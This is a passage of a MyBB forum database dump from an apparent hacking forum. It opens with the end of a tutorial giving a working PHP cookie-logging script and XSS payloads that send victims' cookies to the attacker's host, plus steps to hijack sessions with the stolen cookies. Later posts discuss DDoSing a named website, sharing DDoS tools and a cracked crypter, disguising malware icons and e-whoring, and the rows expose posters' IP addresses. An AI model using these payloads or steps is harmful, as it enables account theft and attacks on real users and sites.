strcasecmp(getenv(\"HTTP_CLIENT_IP\"), \"unknown\")) $ip = getenv(\"HTTP_CLIENT_IP\"); else if (getenv(\"HTTP_X_FORWARDED_FOR\") && strcasecmp(getenv(\"HTTP_X_FORWARDED_FOR\"), \"unknown\")) $ip = getenv(\"HTTP_X_FORWARDED_FOR\"); else if (getenv(\"REMOTE_ADDR\") && strcasecmp(getenv(\"REMOTE_ADDR\"), \"unknown\")) $ip = getenv(\"REMOTE_ADDR\"); else if (isset($_SERVER[\'REMOTE_ADDR\']) && $_SERVER[\'REMOTE_ADDR\'] && strcasecmp($_SERVER[\'REMOTE_ADDR\'], \"unknown\")) $ip = $_SERVER[\'REMOTE_ADDR\']; else $ip = \"unknown\"; return($ip); } function logData() { $ipLog=\"log.txt\"; $cookie = $_SERVER[\'QUERY_STRING\']; $register_globals = (bool) ini_get(\'register_gobals\'); if ($register_globals) $ip = getenv(\'REMOTE_ADDR\'); else $ip = GetIP(); $rem_port = $_SERVER[\'REMOTE_PORT\']; $user_agent = $_SERVER[\'HTTP_USER_AGENT\']; $rqst_method = $_SERVER[\'METHOD\']; $rem_host = $_SERVER[\'REMOTE_HOST\']; $referer = $_SERVER[\'HTTP_REFERER\']; $date=date (\"l dS of F Y h:i:s A\"); $log=fopen(\"$ipLog\", \"a+\"); if (preg_match(\"/\\bhtm\\b/i\", $ipLog) || preg_match(\"/\\bhtml\\b/i\", $ipLog)) fputs($log, \"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>\"); else fputs($log, \"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \\n\\n\"); fclose($log); } logData(); ?> This script will record the cookies of every user that views it. Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection: Code: \"><script language= \"JavaScript\">document.location=\"http://yoursite.com/whateveryouwant.php?cookie=\" + document.cookie;document.location=\"http://www.whateversite.com\"</script> yoursite.com is the server you\'re hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you\'re exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don\'t know anything happened. Note that this injection will only work properly if you aren\'t actually modifying the page source on the server\'s end. Otherwise the unmodified page will actually be the modified page and you\'ll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer: Code: \"><a href=\"#\" onclick=\"document.location=\'http://yoursite.com/whateveryouwant.php?cookie=\' +escape(document.cookie);\"><Click Me></a></script> This will eliminate the looping problem since the user has to cilck on it for it to work, and it\'s only a one-way link. Of course, then the user\'s trail ends at your cookie stealing script, so you\'d need to modify that code a little to keep them from suspecting what\'s going on. You Could just add some text to the page saying something like \"under construction\" by changing the end of our php script from this: Code: logData(); ?> to this: Code: logData(); echo \'<b>Page Under Construction</b>\' ?> Now when you open log.txt, you should see something like this: Code: IP: 125.16.48.169 | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: http://www.ifa.org.nz/search.php | DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373 You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie\'s fields to match the data from the cookie in your log file and refresh the page. The server thinks you\'re the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames. Summary So in summary: 1. Test the page to make sure it\'s vulnerable to XSS injections. 2. Once you know it\'s vulnerable, upload the cookie stealer php file and log file to your server. 3. Insert the injection into the page via the url or text box. 4. Grab the link of that page with your exploited search query (if injection is not stored on the server\'s copy of the page). 5. Get someone to use that link if necessary. 6. Check your log file for their cookie. 7. Modify your own cookie to match the captured one and refresh the page. Credits : [url=http://www.sapbasisworld.com]SAP Basis World -SAP ABAP Java HANA Netweaver Basis[/url]', '180.215.45.255', '-1260966401', '0', '0', '0', '0', '1', 'e2146ec7fa8abdb1ef506b41a31f234e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('250', '98', '233', '20', 'RE: FREE UD RazorCrypter (Cracked)', '0', '13', 'unixmoon', '1344964210', 'Sorry to say but you did a bad thing by upload the crypter to Mediafire because then it won\'t remain FUD for a very long time.', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '757f4de682a2fc43b2949640c6249b99', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('251', '104', '0', '33', 'Photoshop vs Gimp', '0', '13', 'unixmoon', '1344964293', 'Which one is a better program? I want to get into graphics.', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '62bb91f75f8ecbce3d5e9ad7f3bd3c75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('252', '99', '237', '3', 'RE: New theme for LH', '0', '13', 'unixmoon', '1344964367', 'What about a preview for the normal members?', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '6326d97b8a06c2cb898afede0ca1a8a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('253', '31', '86', '7', 'RE: How long are you online daily?', '0', '8', 'spacefish36', '1344964543', 'About 2-4 hours maximum. I don\'t want to destroy my eyes :P', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '523241e34cc1cddd9a33332d3eb7acaf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('254', '52', '134', '9', '?? Adsense Secrets - What Google Never Told ?? [New Release] [Huge Profits]', '0', '8', 'spacefish36', '1344964677', 'Thanks for the download. This thing is awesome.', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '75a35e3369530fa2635a56b02dcf3ae5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('255', '60', '146', '25', 'RE: [guide] Basic Computer Security', '0', '8', 'spacefish36', '1344964779', 'Wow thanks for this guide on computer security. It\'s extremely useful.', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '126259be011119de185ee04e5101ddcd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('256', '105', '0', '11', 'DDos', '3', '48', 'BurnsH4X', '1344965203', 'Hello pple on the internet i was just curious to know how to ddos a small website and more important how to not get ddosed', '78.133.53.116', '1317352820', '1', '0', '0', '0', '1', 'a970c504afbe9cf65e4797236d0c7020', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('257', '106', '0', '38', 'Filling a scam report', '0', '1', 't3h jok3r', '1344965610', 'The reason why it\'s important for you to fill a scam report here is because then it would be useful for others to be extra caution and so that we can also ban the scammer and also provide the needful information to any company you would like. [b]Things to do when scammed[/b] [list] [*] Neg rep or neutral rep the scammer with a link to the dispute [*] Create a scam report with all the information you have [*] Provide the UID of the scammer in the title of the thread [/list] [b]Scam Report Template[/b] [code] [b]User Scammed:[/b] [b]Link to Scammer:[/b] [b]Screenshots/videos of conversation:[/b] [b]Proof of deal/purchase:[/b] [b]What was the deal about?[/b] [b]Other:[/b] [i]**Optional :-[/i] [b]Link to sales thread:[/b] [/code] [color=#FF0000]When providing a Proof of Purchase, please censor the transaction ID and the @DOMAIN.com if the email is visible.[/color] Good Luck and sorry to hear about the scam.', '41.174.19.86', '699274070', '1', '0', '0', '0', '1', '99e4c2a2bb9f334a63ae028d73797d03', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('258', '105', '256', '11', 'RE: DDos', '0', '1', 't3h jok3r', '1344965783', 'To DoS a website, you would need a DDoSer or a Booter. You can download DDoSers from http://l33thacking.com/forumdisplay.php?fid=21 What do you mean by not get DDoSed? I mean prevent getting DDoSed, Knocked off from XBL, Website DDoS protection.', '41.174.19.86', '699274070', '1', '0', '0', '0', '1', '39c69e5c93d79cd5b0e6aa1029499dd4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('259', '95', '225', '13', 'RE: XSS Cheat Sheet', '0', '1', 't3h jok3r', '1344965986', 'Brilliant thread right there OP. Thanks for contributing.', '41.174.19.86', '699274070', '1', '0', '0', '0', '1', '56e3a3fd5c7b1ed0c400b48a6a7c7350', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('260', '6', '124', '4', 'RE: Welcome to L33THacking.com', '0', '1', 't3h jok3r', '1344966038', '[quote=\'Timmy\' pid=\'124\' dateline=\'1342266771\'] Thanks for clarifying the admin tasks. I guess it makes it easier to understand what to report to who. [/quote] True, it does make it a lot easier.', '41.174.19.86', '699274070', '1', '0', '0', '0', '1', '54572eb188c019573545822e41d0be08', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('261', '107', '0', '12', 'how to change the icon of an exe file using resource hacker', '0', '50', 'sana khan', '1344967490', 'hello guys today m gona show u, how to change the icon of an exe file. u will able to change the icon of any exe file or virus with other icons like pictures, jpg , png etc, depend on ur choice. well, this is my first tutorial. i hope u guys will enjoy it. lets get started... [size=medium][b]first u will need following things.[/b] 1) resource hacker software. i recommended resource hacker 3.4 u can use the down link.[/size] [url=http://download.cnet.com/Resource-Hacker/3001-2352_4-10178587.html?spi=4376cba5128219dff5f810717ecde0d3]download link[/url] [size=medium]2)any icon file (.ico)[/size] [url=http://findicons.com/search/picture#]click here for icon[/url] [size=medium]3) an exe file[/size] [size=large][b]steps:[/b][/size] 1. first install resource hacker. then open it. u will get such a window [img]https://lh5.googleusercontent.com/-ajt7VUYoGFc/UCqNUnKYYdI/AAAAAAAAABQ/X3F0zmf7Hp4/s819/Untitled.jpg[/img] 2. click file. then click open. 3. select the exe file, u wanted to change icon of that file. [img]https://lh3.googleusercontent.com/-vqG8DmuM8vk/UCqNTzWRC4I/AAAAAAAAABM/sqUXF9qsax0/s819/2.jpg[/img] 4.after adding image. select icon group. extend the first folder of icon group. right click on file nd select replace resource option. [img]https://lh6.googleusercontent.com/-lfHKCpnDxq0/UCqNI3ds8oI/AAAAAAAAABE/_HApyNi2l40/s819/4.jpg[/img] 5.an other window will open. select any icon of ur choice. [img]https://lh4.googleusercontent.com/-GrdrjZZrP0I/UCqNF0PeMPI/AAAAAAAAAA4/_j7KNRw55pI/s819/5.jpg[/img] 6.then click file and save ur new file. [img]https://lh3.googleusercontent.com/-vEp3Pybu_BQ/UCqNDQPruHI/AAAAAAAAAAk/5k_QhxlBEZk/s683/7.jpg[/img] now the exe file will have icon of ur choice.', '182.177.26.34', '-1229907422', '0', '1', '0', '0', '1', 'de7d0f4e342922482438a2bfeda9acbe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('262', '108', '0', '4', 'Hey all', '0', '53', 'sirchamp', '1344977474', 'Hey guys Im new to this forum^^ Ive been active on several hacking forums. I started to learn to hack about 3years ago and im willing to share my knowledge on this ,rather small (at the moment),forum. Sorry if my english isnt perfect. Im not a native speaker as you perhaps have noticed.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '2922e856113dc5f2ab0969863742136b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('263', '105', '256', '11', 'RE: DDos', '0', '53', 'sirchamp', '1344978603', 'You could even Dos a site with cmd. Ask me if you wanna know how. But as you were reffering to Ddos you would need a botnet or a booter.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '4a8a64b720252be0b2b1f82c69fe6578', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('264', '105', '256', '11', 'RE: DDos', '0', '48', 'BurnsH4X', '1344988747', 'well i have used the cmd but it is not powerful enough it is overcome pretty easily ddos', '78.133.53.116', '1317352820', '0', '0', '0', '0', '1', '677dfb64e45933181e1783d13051f058', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('265', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '48', 'BurnsH4X', '1344988840', 'link is down repost pls and thx', '78.133.53.116', '1317352820', '0', '0', '0', '0', '1', '4a03a04c5e75f1d26436e91047baa4f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('266', '105', '256', '11', 'RE: DDos', '0', '1', 't3h jok3r', '1344989228', 'Honestly some small sites also have minor DDoS protection from Cloudflare so those sites can\'t be knocked down with CMD.', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', 'ec006f56f59a234680e0a0f625f8cf42', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('267', '48', '265', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '1', 't3h jok3r', '1344990456', '[quote=\'BurnsH4X\' pid=\'265\' dateline=\'1344988840\'] link is down repost pls and thx [/quote] The link is working perfectly for me. It\'s down but wait for 5 seconds, then it will auto repair and redirect you to the correct page.', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', 'ef9f04ca2945b3d9098905d130017561', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('268', '109', '0', '4', 'Sin Cara Here', '0', '54', 'Sin Cara', '1344990993', 'Hello, I m sin cara and i m mod here. I will try my best to make this community clean from spammers. Hope i will enjoy my stay here :) Best Regards Sin Cara', '119.154.24.199', '2006587591', '1', '0', '0', '0', '1', '08d74c6617666ecffebf55408eb6b454', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('269', '108', '262', '4', 'RE: Hey all', '0', '1', 't3h jok3r', '1344991900', 'Welcome to l33t hacking! Feel free to PM me for site related problems/help.', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', 'e514a30767452c3183c91191dd72e567', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('270', '109', '268', '4', 'RE: Sin Cara Here', '0', '1', 't3h jok3r', '1344991927', 'Welcome Sin Cara and hope you stay HQ :D Well welcome back actually.', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', '10b3c1722a585b6734d2a4fda3c53d91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('271', '110', '0', '4', 'It\'s Baws...the Baws', '0', '55', 'Baws', '1344993153', 'Hello guys, I\'m Baws, some people might know me from HF, HappyForums. If anyone wants help with anything, hit me up, I\'ll see what I can do. Thanks, Baws', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '1e5c786a595f97f01057f554de92347e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('272', '96', '229', '30', 'RE: FBI Tools [11 in 1]', '0', '55', 'Baws', '1344993237', 'Thanks for these tools, downloading and will check them out! Edit: [b]1. All downloads must contain a virus scan.[/b] 2. Program must not already be distributed in public forums on LH. 3. Download at your own risk!', '98.176.49.100', '1655714148', '0', '0', '55', '1344993293', '1', '7e56cb68b955da7728bb8cd5f565114d', '0', '1344993293'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('273', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '55', 'Baws', '1344993351', 'Wow thanks for the share, now it\'s going to get popular for the pedophiles.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'bc90393b73bc50605959de8f4511d762', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('274', '111', '0', '29', 'MyFreeCams Model Registeration', '0', '1', 't3h jok3r', '1344993386', 'MyFreeCams is a free live webcam porn website. This ebook will show you how to register and earn loads of money through E-Whoring, you will also get access to free lifetime premium porn as well. Download: http://www.mediafire.com/?vdcp44a7we16icg Password: l33t Enjoy!', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', '31a5c5fbe5752c7ecbeffcd8819a125f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('275', '96', '272', '30', 'RE: FBI Tools [11 in 1]', '0', '1', 't3h jok3r', '1344993503', '[quote=\'Baws\' pid=\'272\' dateline=\'1344993237\'] Thanks for these tools, downloading and will check them out! Edit: [b]1. All downloads must contain a virus scan.[/b] 2. Program must not already be distributed in public forums on LH. 3. Download at your own risk! [/quote] But I thought I was the founder of the site and I won\'t upload viruses to harm my members. :(', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', '3d8eb6d25e09f0007de727b26bc985f9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('276', '91', '219', '42', 'RE: Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '55', 'Baws', '1344993687', 'They should take that medal back since he doesn\'t deserve it. :/', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '75534c0b8f5c1dd5f232f8919581510b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('277', '96', '229', '30', 'RE: FBI Tools [11 in 1]', '0', '57', 'Kasane', '1344993791', 'Not a bad share. Thanks. :D', '85.69.208.130', '1430638722', '0', '0', '0', '0', '1', 'e58ee2dfa4ee37ec03627809332077c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('278', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '1', 't3h jok3r', '1344993832', 'Welcome to L33T Hacking. Thanks for signing up. So Mr. Baws, mind sharing what hacking skills you have?', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', '69249295dc70169a2f90a28befdc67fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('279', '111', '274', '29', 'RE: MyFreeCams Model Registeration', '0', '56', '???Emotion™', '1344994184', 'Thank you for the share. I have been wondering how you get through that registration for a while now.', '98.86.145.224', '1649840608', '0', '0', '0', '0', '1', 'c4ce7852184bf2a385e0c65049562cb3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('280', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '56', '???Emotion™', '1344994613', 'Welcome to the site Baws.', '98.86.145.224', '1649840608', '0', '0', '0', '0', '1', '185b7edab86f75309e1db9cb2c24edbb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('281', '111', '274', '29', 'RE: MyFreeCams Model Registeration', '0', '2', 'Apathy', '1344999265', 'I thought you ha said that this I private?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '17ccc1fd6e71366424febe1f3d3a6d4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('282', '105', '266', '11', 'RE: DDos', '0', '48', 'BurnsH4X', '1344999678', '[quote=\'t3h jok3r\' pid=\'266\' dateline=\'1344989228\'] Honestly some small sites also have minor DDoS protection from Cloudflare so those sites can\'t be knocked down with CMD. [/quote] so what program would you recomend me to bring down a website like this www.inthelittlewood.com not to hard i guess the others are all slow and that italian one is italian', '78.133.53.116', '1317352820', '0', '0', '48', '1345000121', '1', 'feffb6f508a03c0ec6965a35c5d81b15', '0', '1345000121'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('283', '112', '0', '19', '[Junk]??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345011546', 'Hello, I m going to give away the premium ebook collection just for free. Some books i bought and some i got my friends. [color=#DAA520][u][b]How to get this Ebooks Pack?[/b][/u][/color] Just Post here, not PM me i will pm you link. [color=#DAA520][u][b]Note[/b][/u][/color] [color=#FF0000][b]Staff [/b][/color]/ [color=#c3c3c3][b]Upgraded[/b][/color] -----> Direct Mediafire link [b]Basic Members[/b] -------> Survey Link', '119.154.5.170', '2006582698', '1', '0', '54', '1345012657', '1', 'b61d74cc0b21b02236df00084c18c737', '0', '1345012657'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('284', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '54', 'Sin Cara', '1345012301', 'Welcome to LH... Be HQ, Stay Active and read rules.', '119.154.5.170', '2006582698', '1', '0', '0', '0', '1', '1c29d5f084ec0ed34896313ba331b950', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('285', '109', '268', '4', 'RE: Sin Cara Here', '0', '54', 'Sin Cara', '1345012825', 'Thanks for saying me welcome :)', '119.154.5.170', '2006582698', '1', '0', '0', '0', '1', '143877182a72af8097aa1455b141aa5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('286', '113', '0', '15', '?Auto Youtube viewer?', '0', '53', 'sirchamp', '1345025859', 'This is a Youtube Viewer Bot. It was NOT made by me. All Credits go to Zero0679. [img]http://i46.tinypic.com/xnauco.jpg[/img] [color=#000080]Features: [color=#FF0000]-Proxie list included -Boost youtube views [/color]Virusscan: [/color][color=#FFFFFF]https://www.virustotal.com/file/e65d6de10c2ba7bc8afeda513b1d80b4d85b49b60d95bb9073bf51bd5a42844e/analysis/1345025398/ [/color][lock][color=#000080]Download: [/color]http://adf.ly/BuVGp[/lock] [color=#000080]Password: [/color][color=#FFFFFF]l33t [/color]', '188.155.56.90', '-1130678182', '1', '0', '1', '1352012216', '1', '5c15b82c63155859267e660e9dc892f8', '0', '1352012216'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('287', '114', '0', '19', '[Junk]Havij', '0', '53', 'sirchamp', '1345027702', 'A very good tool :D [img]http://i47.tinypic.com/2aguvr6.jpg[/img] [color=#000080]Download: [/color][color=#FFFFFF]http://adf.ly/BuVuE [/color][color=#000080]Password: [/color][color=#FFFFFF]sir [/color]', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 